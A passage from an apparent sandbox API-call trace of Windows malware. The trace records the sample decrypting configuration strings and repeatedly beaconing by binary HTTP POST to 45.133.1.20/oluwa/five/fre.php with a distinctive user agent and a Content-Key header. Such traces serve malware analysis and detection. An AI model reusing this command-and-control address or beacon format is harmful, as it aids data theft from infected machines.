pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.489] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.489] GetProcessHeap () returned 0x6a0000 [0238.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0238.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.491] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0238.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.491] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0238.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.492] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0238.492] GetProcessHeap () returned 0x6a0000 [0238.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.493] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0238.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0238.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.495] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0238.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.496] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0238.496] GetProcessHeap () returned 0x6a0000 [0238.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0238.496] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0238.496] GetProcessHeap () returned 0x6a0000 [0238.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0238.496] socket (af=2, type=1, protocol=6) returned 0x784 [0238.497] connect (s=0x784, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0238.526] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0238.526] GetProcessHeap () returned 0x6a0000 [0238.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0238.526] GetProcessHeap () returned 0x6a0000 [0238.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf20 [0238.527] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.528] wvsprintfA (in: param_1=0x6daf20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.528] GetProcessHeap () returned 0x6a0000 [0238.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4978 [0238.528] GetProcessHeap () returned 0x6a0000 [0238.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0238.529] GetProcessHeap () returned 0x6a0000 [0238.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0238.529] GetProcessHeap () returned 0x6a0000 [0238.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf20 [0238.530] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.531] wvsprintfA (in: param_1=0x6daf20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.531] GetProcessHeap () returned 0x6a0000 [0238.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0238.531] GetProcessHeap () returned 0x6a0000 [0238.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0238.534] send (s=0x784, buf=0x6bd460*, len=242, flags=0) returned 242 [0238.535] send (s=0x784, buf=0x6bb998*, len=159, flags=0) returned 159 [0238.535] GetProcessHeap () returned 0x6a0000 [0238.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0238.535] recv (in: s=0x784, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0238.608] GetProcessHeap () returned 0x6a0000 [0238.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0238.609] GetProcessHeap () returned 0x6a0000 [0238.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0238.610] GetProcessHeap () returned 0x6a0000 [0238.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4978 | out: hHeap=0x6a0000) returned 1 [0238.610] GetProcessHeap () returned 0x6a0000 [0238.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0238.610] closesocket (s=0x784) returned 0 [0238.611] GetProcessHeap () returned 0x6a0000 [0238.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0238.611] GetProcessHeap () returned 0x6a0000 [0238.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.611] GetProcessHeap () returned 0x6a0000 [0238.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0238.612] GetProcessHeap () returned 0x6a0000 [0238.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0238.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14b8) returned 0x784 [0238.614] Sleep (dwMilliseconds=0xea60) [0238.616] GetProcessHeap () returned 0x6a0000 [0238.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0238.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0238.632] GetProcessHeap () returned 0x6a0000 [0238.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0238.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.634] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0238.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.646] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.647] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.647] GetProcessHeap () returned 0x6a0000 [0238.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0238.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.649] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0238.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.652] CryptDestroyKey (hKey=0x6ad020) returned 1 [0238.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.653] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0238.653] GetProcessHeap () returned 0x6a0000 [0238.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.654] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.655] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.657] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.658] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.658] GetProcessHeap () returned 0x6a0000 [0238.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0238.658] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.659] GetProcessHeap () returned 0x6a0000 [0238.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0238.659] GetProcessHeap () returned 0x6a0000 [0238.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.660] GetProcessHeap () returned 0x6a0000 [0238.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0238.660] GetProcessHeap () returned 0x6a0000 [0238.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0238.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.661] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0238.679] GetProcessHeap () returned 0x6a0000 [0238.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0238.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.680] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0238.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.681] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.683] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.683] GetProcessHeap () returned 0x6a0000 [0238.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0238.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.686] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0238.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.688] CryptDestroyKey (hKey=0x6ad020) returned 1 [0238.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.689] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0238.689] GetProcessHeap () returned 0x6a0000 [0238.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.691] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0238.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.692] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0238.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.694] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0238.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.697] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0238.697] GetProcessHeap () returned 0x6a0000 [0238.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0238.697] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0238.698] GetProcessHeap () returned 0x6a0000 [0238.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0238.698] socket (af=2, type=1, protocol=6) returned 0x788 [0238.698] connect (s=0x788, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0238.752] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0238.752] GetProcessHeap () returned 0x6a0000 [0238.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0238.752] GetProcessHeap () returned 0x6a0000 [0238.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0238.753] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.754] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.754] GetProcessHeap () returned 0x6a0000 [0238.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c53f8 [0238.754] GetProcessHeap () returned 0x6a0000 [0238.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0238.755] GetProcessHeap () returned 0x6a0000 [0238.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0238.755] GetProcessHeap () returned 0x6a0000 [0238.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0238.756] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.757] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.757] GetProcessHeap () returned 0x6a0000 [0238.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0238.757] GetProcessHeap () returned 0x6a0000 [0238.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0238.758] send (s=0x788, buf=0x6bd460*, len=242, flags=0) returned 242 [0238.758] send (s=0x788, buf=0x6bb998*, len=159, flags=0) returned 159 [0238.759] GetProcessHeap () returned 0x6a0000 [0238.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0238.759] recv (in: s=0x788, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0238.825] GetProcessHeap () returned 0x6a0000 [0238.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0238.826] GetProcessHeap () returned 0x6a0000 [0238.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0238.827] GetProcessHeap () returned 0x6a0000 [0238.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c53f8 | out: hHeap=0x6a0000) returned 1 [0238.828] GetProcessHeap () returned 0x6a0000 [0238.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0238.828] closesocket (s=0x788) returned 0 [0238.829] GetProcessHeap () returned 0x6a0000 [0238.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0238.829] GetProcessHeap () returned 0x6a0000 [0238.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.830] GetProcessHeap () returned 0x6a0000 [0238.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0238.830] GetProcessHeap () returned 0x6a0000 [0238.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0238.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14bc) returned 0x788 [0238.833] Sleep (dwMilliseconds=0xea60) [0238.834] GetProcessHeap () returned 0x6a0000 [0238.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0238.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.836] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0238.859] GetProcessHeap () returned 0x6a0000 [0238.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dbc08 [0238.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.860] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6dbc08, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0238.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.864] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.866] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.866] GetProcessHeap () returned 0x6a0000 [0238.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbc08 | out: hHeap=0x6a0000) returned 1 [0238.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.867] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0238.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.872] CryptDestroyKey (hKey=0x6ad560) returned 1 [0238.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.874] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0238.874] GetProcessHeap () returned 0x6a0000 [0238.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.875] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.877] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.878] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.879] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.879] GetProcessHeap () returned 0x6a0000 [0238.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0238.879] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.880] GetProcessHeap () returned 0x6a0000 [0238.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0238.880] GetProcessHeap () returned 0x6a0000 [0238.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.881] GetProcessHeap () returned 0x6a0000 [0238.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0238.881] GetProcessHeap () returned 0x6a0000 [0238.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0238.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.885] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.890] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0238.920] GetProcessHeap () returned 0x6a0000 [0238.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0238.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.922] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0238.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.923] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.924] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.925] GetProcessHeap () returned 0x6a0000 [0238.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0238.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.926] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0238.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.931] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0238.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.932] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0238.932] GetProcessHeap 